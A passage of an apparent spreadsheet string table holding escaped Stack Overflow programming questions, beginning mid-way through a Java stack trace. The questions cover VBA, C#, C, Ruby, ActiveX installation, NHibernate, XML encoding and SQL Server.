    at com.companyremoved.ioc.IocTarget.iocMessage(IocTarget.java:138)
    at com.companyremoved.ioc.IocBinding.iocMessage(IocBinding.java:105)
    at com.companyremoved.system.coms.ComsSender$Messages.removePipe(ComsSender.java:302)
    at com.companyremoved.system.coms.ConnectionController.disconnect(ConnectionController.java:712)
    at com.companyremoved.system.coms.ConnectionController.shutdown(ConnectionController.java:224)
    at com.companyremoved.system.coms.ConnectionController.processIocMessage(ConnectionController.java:168)
    at com.companyremoved.ioc.IsolatedObject.deliver(IsolatedObject.java:311)
    - locked &amp;lt;0x12a8b798&amp;gt; (a com.companyremoved.system.coms.ConnectionController)
    at com.companyremoved.ioc.IsolatedObject.access$100(IsolatedObject.java:36)
    at com.companyremoved.ioc.IsolatedObject$SignalProxy.run(IsolatedObject.java:526)
    at com.companyremoved.thd.RunQueue.runEntry(RunQueue.java:293)
    at com.companyremoved.thd.RunQueue.run(RunQueue.java:273)
    at java.lang.Thread.run(Unknown Source)
   Locked ownable synchronizers:
    - None
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Proper Memory allocation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following construction:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef struct bucket {
    char *key;
    ENTRY *data;
    struct bucket *next;
} bucket;
typedef struct {
    size_t size;
    bucket **table;
} hash_table;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I have no idea how to allocate memory for that. I tried: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;hash_table* ht = malloc(sizeof(hash_table)*101);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in order to create a hashtable for 101 entries but it din't work! Can anyone help me? I would really appreciate it!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Runtime error 1004: Application-defined or object-defined error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been having a major issue... well maybe not major, but I've been trying to figure this out since yesterday lunchtime.&lt;br /&gt;
I have the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Application.CutCopyMode = False
ActiveWorkbook.PivotCaches.Add(SourceType:=xlDatabase, SourceData:= _
    "Data!R7C1:R5000C40").CreatePivotTable TableDestination:= _
    "'[Master-File.xls]Analyse'!R20C14", TableName:="certain_view", DefaultVersion _
-&amp;gt;   :=xlPivotTableVersion10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The runtime error is in the line with the arrow, but the entire bit quoted above highlights yellow.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Application-defined or object-defined error&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I am using Excel 2003, VBA. I have these few lines of script in my code five times, and only this bit fails every time. I am trying to create the fifth PivotTable with these lines.&lt;/p&gt;
&lt;p&gt;I think it might have something to do with the amount of data in memory... yet the Application.Cutopymode = False doesn't fix anyhting.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I programmatically check an item in a checkedlistbox in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a checkedlistbox and I want to automatically tick one of the items in it.  &lt;/p&gt;
&lt;p&gt;The CheckedItems collection doesn't allow you to add things to it.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSON object for just an integer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Silly question, but I'm unable to figure out..&lt;/p&gt;
&lt;p&gt;I tried the following in Ruby:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;irb(main):020:0&amp;gt; JSON.load('[1,2,3]').class
=&amp;gt; Array
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems to work. While neither&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JSON.load('1').class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;nor this &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JSON.load('{1}').class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;works. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How load a PHP page in the same window in jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a PHP file, Test.php, and it has two functions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
    echo displayInfo();
    echo displayDetails();
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;JavaScript:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
     ...
    &amp;lt;script type="text/javascript"&amp;gt;
        $.ajax({
            type:'POST',
            url: 'display.php',
            data:'id='+id  ,
            success: function(data){
                $("#response").html(data);
            }
        });
    &amp;lt;/script&amp;gt;
    ...
    &amp;lt;div id="response"&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It returns the response from jQuery. The response shows as &lt;code&gt;&amp;lt;a href=Another.php?&amp;gt;Link&amp;lt;/a&amp;gt;&lt;/code&gt;. When I click the Another.php link in &lt;code&gt;test.php&lt;/code&gt;, it loads in another window. But I need it to load the same &lt;code&gt;&amp;lt;div&amp;gt; &amp;lt;/div&amp;gt;&lt;/code&gt; area without changing the content of &lt;code&gt;test.php&lt;/code&gt;, since it has &lt;code&gt;displayInfo(), displayDetails()&lt;/code&gt;. Or is it possible to load a PHP page inside &lt;code&gt;&amp;lt;div&amp;gt; &amp;lt;/div&amp;gt;&lt;/code&gt; elements?&lt;/p&gt;
&lt;p&gt;How can I tackle this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to access an Access database using JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to display marks of my students through my site. The database is created using &lt;a href="http://en.wikipedia.org/wiki/Microsoft_Access" rel="nofollow"&gt;Microsoft Access&lt;/a&gt;. How can I display the marks of each student in a table, as they enter the registration number?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to go to main stack</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using alternate stack to handle signals for program in C over linux.
When stack overflow occurs, my signal are delivered on to my alternate signal stack not on the main stack.&lt;/p&gt;
&lt;p&gt;So in this situation I want to dump the &lt;strong&gt;main&lt;/strong&gt; stack.... how can I ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>internal constructor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Yesterday I thought it would be nice to implement my own Trigger in a WPF app. I created a class MyTrigger which inherited TriggerBase. TriggerBase is a public abstract class. So inheritance isn't a problem. But the constructors inside this class are marked internal. The compiler throws an error because the is no valid constructor. Why does anyone create a public class but marks the constructors as internal?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2005 -&gt; 2008/10 Service Installer Project Upgrade issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've upgraded a [.vdproj MSI generator project built into VS2008] System.Configuration.Install.Installer with a &lt;code&gt;ServiceProcessInstaller&lt;/code&gt; and a &lt;code&gt;ServiceInstaller&lt;/code&gt; from Visual Studio 2005 to 2008. There are no customisations of consequence to the installer class (i.e., not trying to start or stop services or register children)&lt;/p&gt;
&lt;p&gt;&lt;code&gt;RemovePreviousVersions&lt;/code&gt; is set to &lt;code&gt;true&lt;/code&gt;, and I'm changing the &lt;code&gt;Version&lt;/code&gt; and &lt;code&gt;ProductCode&lt;/code&gt;. This triggers an error during the install:&lt;/p&gt;
&lt;p&gt;"error 1001: the specified service already exists"&lt;/p&gt;
&lt;p&gt;Googling yields stuff (but not on SO until now):- &lt;a href="http://www.google.ie/search?hl=en&amp;amp;q=%22error+1001%3A+the+specified+service+already+exists%22&amp;amp;meta=" rel="nofollow"&gt;Google for "The specified service already exists"&lt;/a&gt;&lt;br&gt;
The most useful one I've seen to date is &lt;a href="http://forums.msdn.microsoft.com/en-US/winformssetup/thread/b2d1bd22-8499-454e-9cec-1e42c03e2557/" rel="nofollow"&gt;http://forums.msdn.microsoft.com/en-US/winformssetup/thread/b2d1bd22-8499-454e-9cec-1e42c03e2557/&lt;/a&gt;
however this doesn't answer the fundamental question:-&lt;/p&gt;
&lt;p&gt;Given that the user can pick either:&lt;br&gt;
a) an install location that's the same&lt;br&gt;
or b) an install location that's different&lt;br&gt;
what are the minimal code changes would one sensibly make to ensure that the old service gets uninstalled and the new one gets installed? Or is there something other than a code change required to resolve this for the basic scenario of upgrading v1.0.1 to v1.0.2 of the same service with the same name (i.e., signing)&lt;/p&gt;
&lt;p&gt;(AIUI the strong naming only comes into play if one has a significant uninstall step in the old installer that you dont have in the new one.)&lt;/p&gt;
&lt;p&gt;I generated a new installer in VS 2008 and it fares no better.&lt;/p&gt;
&lt;p&gt;For now, my workaround is to stop updating the &lt;code&gt;Version&lt;/code&gt; and &lt;code&gt;ProductCode&lt;/code&gt;, forcing the user to manually uninstall when they are told they already have a version installed.&lt;/p&gt;
&lt;p&gt;Addendum thanks to &lt;a href="http://stackoverflow.com/users/40347/divo"&gt;divo's&lt;/a&gt; probing: While the simplest hack that could possibly work is to say "if install step is called &amp;amp; its an upgrade, call the uninstall step for the service first", I'd like a proper officially blessed answer! (e.g., how does the simple hack cope when the service is being renamed during an upgrade?)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Auto Install activeX</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a web developer and my current task is to build an ActiveX component. &lt;/p&gt;
&lt;p&gt;It's the first time I have to work with ActiveX and I managed to make an working example.&lt;/p&gt;
&lt;p&gt;However I cannot make the ActiveX install from a browser. When installing it using visual studio 2008 and running the web page all works as expected, when I don't have it installed I would expect something similar to windows updates asking me if I allow the installation but this does not happen....&lt;/p&gt;
&lt;p&gt;Here is how I'm placing it in the web page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;object id="myActiveX" name="myActiveX" classid="clsid:A68B19C8-9DB4-49e4-912F-37FB44968528"
                 codebase="http://localhost/myWebSite/install.cab#version=1,0,0,0"&amp;gt;&amp;lt;/object&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The guid in the classId matches the guid I created for my class.&lt;/p&gt;
&lt;p&gt;Can anyone point out what I'm missing? &lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;Forgot to mention this, I have a Setup Project for my ActiveX that generates an .msi and an Setup.exe&lt;/p&gt;
&lt;p&gt;i have made a cab file with those using a .inf file as so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[version]
signature="$CHICAGO$"
AdvancedINF=2.0
[Setup Hooks]
hook1=hook1
[hook1]
run=msiexec.exe /i %EXTRACT_DIR%\Install.msi /qf
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>is it possible to set per-file options for Nedit like you can do for emacs/vim</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With VIM or Emacs I can put comments in the file that will be VIM's settings for that file:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&lt;/p&gt;
&lt;pre&gt;
/*
 * Local Variables:     
 * mode: C
 * c-basic-offset: 4
 * c-indentation-style: linux
 * indent-tabs-mode: nil
 * default-tab-width: 8
 * fill-column: 125
 * End:
 *
 * vim: et:sw=4:ts=8:si:cindent:cino=\:0,g0,(0:
 */
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;Can the same be done with Nedit?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create a file without a Command Prompt window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using WinRAR SFX module to create an installation, and use its presetup option to run some preliminary tests.&lt;/p&gt;
&lt;p&gt;Since wscript can only accept vbs file, and not the script itself, I first run "cmd /c echo {...script code...} &gt; setup.vbs", and then I run "wscript setup.vbs". The run of the first cmd command opens a brief command window, and I would really like to avoid this. I thought of using RunDll32 to write this data, but couldn't find any suitable API to use.&lt;/p&gt;
&lt;p&gt;Can anyone think of a way to bypass it and create a small file with a small VBScript text without opening a Command Prompt window?&lt;/p&gt;
&lt;p&gt;Thanks a lot,&lt;/p&gt;
&lt;p&gt;splintor&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use type of object in HQL where clause</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my domain model I have an abstract class CommunicationChannelSpecification, which has child classes like FTPChannelSpecification, EMailChannelSpecification and WebserviceChannelSpecification. Now I want to create an HQL query which contains a where clause that narrows down the result to certain types of channel specifications. E.g. (in plain English) select all CommunicationChannelSpecifications that whose types occur in the set {FTPChannelSpecification, WebserviceChannelSpecification}.&lt;/p&gt;
&lt;p&gt;How can this be achieved in HQL? I'm using NHibernate 2.0.1 and a table per subclass inheritance mapping strategy...&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;Pascal&lt;/p&gt;
</t>
  </si>
  <si>
    <t>loadVideoById() in YouTube's regular player (not chromeless)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a YouTube's player in the webpage. I need to change the video played by this player dynamicaly.&lt;/p&gt;
&lt;p&gt;This is (relatively) easy using YouTube's chromeless player. It has method &lt;a href="http://code.google.com/apis/youtube/chromeless_player_reference.html#loadVideoById"&gt;&lt;code&gt;loadVideoById()&lt;/code&gt;&lt;/a&gt; which works perfectly. The problem is, that the chromeless player doesn't have any controls (play/pause, etc.). The &lt;a href="http://code.google.com/apis/youtube/js_api_reference.html#Functions"&gt;regular YouTube player&lt;/a&gt; has all this, but it doesn't have the &lt;code&gt;loadVideoById()&lt;/code&gt; method.&lt;/p&gt;
&lt;p&gt;Is there any way to include the controls of regular player into chromeless player, or to implement &lt;code&gt;loadVideoById()&lt;/code&gt; method in the regular player?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert NSDecimalNumber to NSInteger?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;OK, I'm using a JSON-enabled Rails web-service to provide data to an iPhone application. I'm finding my Integer values (IDs) are being interpreted by the json-framework as a NSDecimalNumber type. I need it as an integer. How can I get an integer value out of my NSDecimalNumber typed variable? I have tried everything I know, and I'm at my wits end.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find Programming Language Used</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whats the easiest way to find out what programming language an application was written in?
I would like to know if its vb or c++ or delphi or .net etc from the program exe file.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oracle SQL - Parsing a name string and converting it to first initial &amp; last name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to turn this string: "Smith, John R"&lt;br&gt;
Into this string: "jsmith" ?&lt;/p&gt;
&lt;p&gt;I need to lowercase everything with lower()&lt;br&gt;
Find where the comma is and track it's integer location value&lt;br&gt;
Get the first character after that comma and put it in front of the string&lt;br&gt;
Then get the entire last name and stick it after the first initial.&lt;br&gt;&lt;br&gt;
Sidenote - instr() function is not compatible with my version&lt;br&gt;&lt;br&gt;
Thanks for any help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Entities and calculated properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best practice to implement the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;we have a classes &lt;code&gt;Order&lt;/code&gt; and
&lt;code&gt;OrderItem&lt;/code&gt; as parent-child. &lt;/li&gt;
&lt;li&gt;Class    &lt;code&gt;OrderItem&lt;/code&gt; provides property &lt;code&gt;Cost&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;On the OrdersList form we have to see    &lt;code&gt;MaxCost&lt;/code&gt; column = max(cost)
from &lt;code&gt;Items&lt;/code&gt; collection&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I found only one useful solution here which won't break the DDD concepts: to add a usual property &lt;code&gt;MaxCost&lt;/code&gt; to the class &lt;code&gt;Order&lt;/code&gt; and to update it each time when items list updates.&lt;/p&gt;
&lt;p&gt;Is there another way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best solution for turning a website into a pdf</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The company I work for we have a CBT system we have developed. We have to go through and create books out of the content that is in our system, I have developed a program that goes through and downloads all of the content out of our system and creates a offline version of the different training modules.&lt;/p&gt;
&lt;p&gt;I created a program that creates PDF documents using the offline version of the CBT. It works by using Websites Screenshot to create a screen shot of the different pages and then using iTextSharp it creates a PDF Document from those images.&lt;/p&gt;
&lt;p&gt;It seams to be a memory hug and painfully slow. There are 40 CBT Modules that it needs to turn into books. Even though I take every step to clear the memory after each time it creates a book. After about 2 books it crashes because there is no memory left.&lt;/p&gt;
&lt;p&gt;Is there a better way to do this instead of having to take a screen shot of the pages that will yield the same look of the web page inside the pdf document?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are "unstacked calls in outer" in Perl's Devel::DProf?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am profiling a Perl application with &lt;code&gt;perl -d:DProf&lt;/code&gt;. When running &lt;code&gt;dprofpp&lt;/code&gt; on the resulting &lt;code&gt;tmon.out&lt;/code&gt; file, I get warnings like these:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Compress::Zlib::__ANON__ has 5 unstacked calls in outer
Compress::Zlib::AUTOLOAD has -5 unstacked calls in outer
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;What is an unstacked call?&lt;/li&gt;
&lt;li&gt;Who or what is "outer"?&lt;/li&gt;
&lt;li&gt;What do the numbers mean? How can there be a negative number of calls?&lt;/li&gt;
&lt;li&gt;Should I worry?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How do I do "svn st" in AnkhSVN for Visual Studio? -no text-</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just installed AnkhSVN and I see the equivalent of "svn up" but I'd prefer to run "svn st" first so that I don't just blindly update.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.Net XmlWriter - unexpected encoding is confusing me</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Environment is VS2008, .Net 3.5&lt;/p&gt;
&lt;p&gt;The following C# code (note the specified encoding of UTF8)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XmlWriterSettings settings = new XmlWriterSettings ();
StringBuilder sb  = new StringBuilder();
settings.Encoding = System.Text.Encoding.UTF8;
settings.Indent   = false;
settings.NewLineChars = "\n";
settings.ConformanceLevel =  System.Xml.ConformanceLevel.Document;
XmlWriter writer = XmlWriter.Create (sb, settings);
{
   // Write XML data.
   writer.WriteStartElement ("CCHEADER");
   writer.WriteAttributeString ("ProtocolVersion", "1.0.0");
   writer.WriteAttributeString ("ServerCapabilities", "0x0000000F");
   writer.WriteEndElement ();
   writer.Flush ();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Actually generates the XML (&gt;&amp;lt; omitted because SO barfs on them):&lt;/p&gt;
&lt;p&gt;?xml version="1.0" encoding="utf-16"?&lt;br&gt;
CCHEADER ProtocolVersion="1.0.0" ServerCapabilities="0x0000000F" /&lt;/p&gt;
&lt;p&gt;Why do I get the wrong encoding generated here ? What am I doing wrong ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is MSXML2.ServerXMLHTTP's default Content-Type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my &lt;a href="http://stackoverflow.com/questions/369226/receiving-xml-from-another-websites-call-to-serverxmlhttp-post-in-classic-asp"&gt;previous question&lt;/a&gt;, I was accidentally sending token/value pairs with an &lt;code&gt;text/xml&lt;/code&gt; Content-Type which resulted in nothing being sent. Tim C's insight into that problem was extremely helpful. Thanks again, Tim!&lt;/p&gt;
&lt;p&gt;Looking back at the original sending code, I now realize that the setting of the &lt;code&gt;ServerXMLHTTP&lt;/code&gt;'s Content-Type to &lt;code&gt;text/xml&lt;/code&gt; was a recent and erroneous addition. The sending code I posted in my question looked like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;url = "www.receivingwebsite.com\asp\receivingwebpage.asp"
information = "UserName=Colt&amp;amp;PassWord=Taylor&amp;amp;Data=100"
Set xmlhttp = server.Createobject("MSXML2.ServerXMLHTTP")
xmlhttp.Open "POST", url, false
xmlhttp.setRequestHeader "Content-Type", "text/xml"
xmlhttp.send information
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The actual sending code is really:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;url = "www.receivingwebsite.com\asp\receivingwebpage.asp"
information = "UserName=Colt&amp;amp;PassWord=Taylor&amp;amp;Data=100"
Set xmlhttp = server.Createobject("MSXML2.ServerXMLHTTP")
xmlhttp.Open "POST", url, false
xmlhttp.send information
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...with no attempt to set the Content-Type before sending.&lt;/p&gt;
&lt;p&gt;Unfortunately, the problem that originally lead me to ask for help still exists.  My receiving classic asp page cannot see the information which is being posted by the &lt;code&gt;ServerXMLHTTP&lt;/code&gt; object.  The information is not in the request object's &lt;code&gt;querystring&lt;/code&gt; or the &lt;code&gt;form&lt;/code&gt; array.  No matter what I do, I can't find the information but I know that it is being sent because when I change the content-type to &lt;code&gt;application/x-www-form-urlencoded&lt;/code&gt;, I can see it in &lt;code&gt;request.form&lt;/code&gt; array.&lt;/p&gt;
&lt;p&gt;So what is the default content-type of the &lt;code&gt;MSXML2.ServerXMLHTTP&lt;/code&gt; class?
And where is my information when the sending class is using that default content-type?&lt;/p&gt;
&lt;p&gt;Thanks in advance for any assistance! Peace, Colt Taylor&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Save Record to Relational Tables With Linq To Sql</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have three tables like that:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Articles&lt;/strong&gt;
IdArticle
Title
Content&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tags&lt;/strong&gt;
IdTag
TagName&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ContentTag&lt;/strong&gt;
IdContentTag
Idtag
IdContent&lt;/p&gt;
&lt;p&gt;When user in my site write an article with adding tags and submit, I want to save it to tables above. &lt;/p&gt;
&lt;p&gt;In traditional ways, I used to use transaction and I could do it. But How can I do it by using linq to sql?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tables vs CSS for positioning and design</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;b&gt;Duplicate: &lt;a href="http://stackoverflow.com/questions/30251/tables-instead-of-divs#30271"&gt;&lt;a href="http://stackoverflow.com/questions/30251/tables-instead-of-divs#30271"&gt;Tables instead of DIVs&lt;/a&gt;&lt;/a&gt; and 
&lt;a href="http://stackoverflow.com/questions/83073/div-vs-table#83121"&gt;&lt;a href="http://stackoverflow.com/questions/83073/div-vs-table#83121"&gt;Why not use tables for layout in HTML?&lt;/a&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;I am working on building a web app using ASP .NET MVC (needs to run on IE 7, FF 3.0), does it matter if I were to use tables rather than css for positioning and design?&lt;/p&gt;
&lt;p&gt;&lt;br /&gt; As a developer I haven't had a chance to work with css. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reliable way to see process-specific perf statistics on an IIS6 app pool</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In perfmon in Windows Server 2003, there are counter objects to get per-process processor time and memory working set statistics. The only problem is that in an environment with multiple application pools, there is no way to reliably identify the correct worker process. In perfmon, they are all called "w3wp", and if there is more than one, they are w3wp, w3wp#1, w3wp#2, and so on. Even these names are unreliable - the number depends on which one started first, and obviously changes when an app pool is recycled because the process is destroyed and restarted.&lt;/p&gt;
&lt;p&gt;I haven't found any ASP.NET-specific counters, and for some reason, my IIS object doesn't separate instances - there's only one "global" instance.&lt;/p&gt;
&lt;p&gt;Ultimately, I just want the "% Processor Time" and "Working Set" counters for a specific IIS App Pool. Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# COM DLL: do I use Regasm, or Regsvr32?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a C# ActiveX DLL... do I use REGASM or REGSVR32 to register it?&lt;/p&gt;
&lt;p&gt;How do I register the 64-bit interface vs the 32-bit interface?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET Processing spawning issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an executable that runs instantly from a command prompt, but does not appear to ever return when spawned using System.Diagnostics.Process:&lt;/p&gt;
&lt;p&gt;Basicly, I'm writing a .NET library wrapper around the Accurev CLI interface, so each method call spawns the CLI process to execute a command.&lt;/p&gt;
&lt;p&gt;This works great for all but one command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  accurev.exe show depots
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, when running this from a console, it runs fine, when I call it using a .net process, it hangs...The process spawning code I use is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public static string ExecuteCommand(string command)
    {
        Process p = createProcess(command);
        p.Start();            
        p.WaitForExit();
        // Accurev writes to the error stream if ExitCode is non zero.
        if (p.ExitCode != 0)
        {
            string error = p.StandardError.ReadToEnd();
            Log.Write(command + " failed..." + error);
            throw new AccurevException(error);                 
        }
        else
        {
            return p.StandardOutput.ReadToEnd();
        }
    }
    /// Creates Accurev Process 
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;param name="command"&amp;gt;&amp;lt;/param&amp;gt;
    /// &amp;lt;returns&amp;gt;&amp;lt;/returns&amp;gt;
    private static Process createProcess(string command)
    {
        Log.Write("Executing Command: " + command);
        ProcessStartInfo startInfo = new ProcessStartInfo();
        Process p = new Process();
        startInfo.CreateNoWindow = false;
        startInfo.RedirectStandardOutput = true;
        startInfo.RedirectStandardInput = true;
        startInfo.RedirectStandardError = true;
        startInfo.UseShellExecute = false;
        startInfo.Arguments = command;
        startInfo.FileName = _accurev;
        p.StartInfo = startInfo;
        return p;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It hangs at p.WaitForExit().&lt;/p&gt;
&lt;p&gt;Any advice?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: Solved!&lt;/p&gt;
&lt;p&gt;.NET Process's hang if the output buffer overflows, I switched to using an asynchronous read method and everything works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public static string ExecuteCommand(string command)
    {
        StringBuilder outputData = new StringBuilder();
        Process p = createProcess(command);
        p.OutputDataReceived += delegate(object sender, DataReceivedEventArgs e)
        {
            outputData.AppendLine(e.Data);
        };
        p.Start();
        p.BeginOutputReadLine();
        p.WaitForExit();
        // Accurev writes to the error stream if ExitCode is non zero.
        if (p.ExitCode != 0)
        {
            string error = p.StandardError.ReadToEnd();
            Log.Write(command + " failed..." + error);
            throw new AccurevException(error);                 
        }
        else
        {
            return outputData.ToString();
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Best practice for graceful replace of read-only SQL Server database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a read-only database that has cached information which is used to display pages on the site. There are processes that run to generate the database, and those run on a different server. When I need to update the live database, I restore this database to the live server, to a new name and file. Then I drop the live database and rename this one to the original name. Currently I do this with a stored procedure, that kills all connections via 'sp_who' and 'kill', then the drop database command, then 'sp_renamedb'. Now when I kill all connections it will throw an error on the site for people and crawlers currently accessing those pages, is there a better methodology for performing this procedure?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generics, arrays, and the ClassCastException</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think there must be something subtle going on here that I don't know about. Consider the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Foo&amp;lt;T&amp;gt; {
  private T[] a = (T[]) new Object[5];
  public Foo() {
    // Add some elements to a
  }
  public T[] getA() {
    return a;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Suppose that your main method contains the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foo&amp;lt;Double&amp;gt; f = new Foo&amp;lt;Double&amp;gt;();
Double[] d = f.getA();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You will get a CastClassException with the message java.lang.Object cannot be cast to java.lang.Double.&lt;/p&gt;
&lt;p&gt;Can anyone tell me why? My understanding of ClassCastException is that it is thrown when you try to cast an object to a type that cannot be casted. That is, to a subclass of which it is not an instance (to quote the documentation). e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Object o = new Double(3.);
Double d = (Double) o; // Working cast
String s = (String) o; // ClassCastException
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And it seems I can do this. If &lt;code&gt;a&lt;/code&gt; was just a &lt;code&gt;T&lt;/code&gt; instead of an array &lt;code&gt;T[]&lt;/code&gt;, we can get &lt;code&gt;a&lt;/code&gt; and cast it without a problem. Why do arrays break this?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would someone download a website from Google Cache?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A friend accidentally deleted his forum database. Which wouldn't normally be a huge issue, except for the fact that he neglected to perform backups. 2 years of content is just plain gone. Obviously, he's learned his lesson.&lt;/p&gt;
&lt;p&gt;The good news, however, is that Google keeps backups, even if individual site owners are idiots. The bad news is, that traditional crawling robots would choke on the Google Cache version of the website. &lt;/p&gt;
&lt;p&gt;Is there anything existing that would help trawl the Google Cache, or how would I go about rolling my own?&lt;/p&gt;
</t>
  </si>
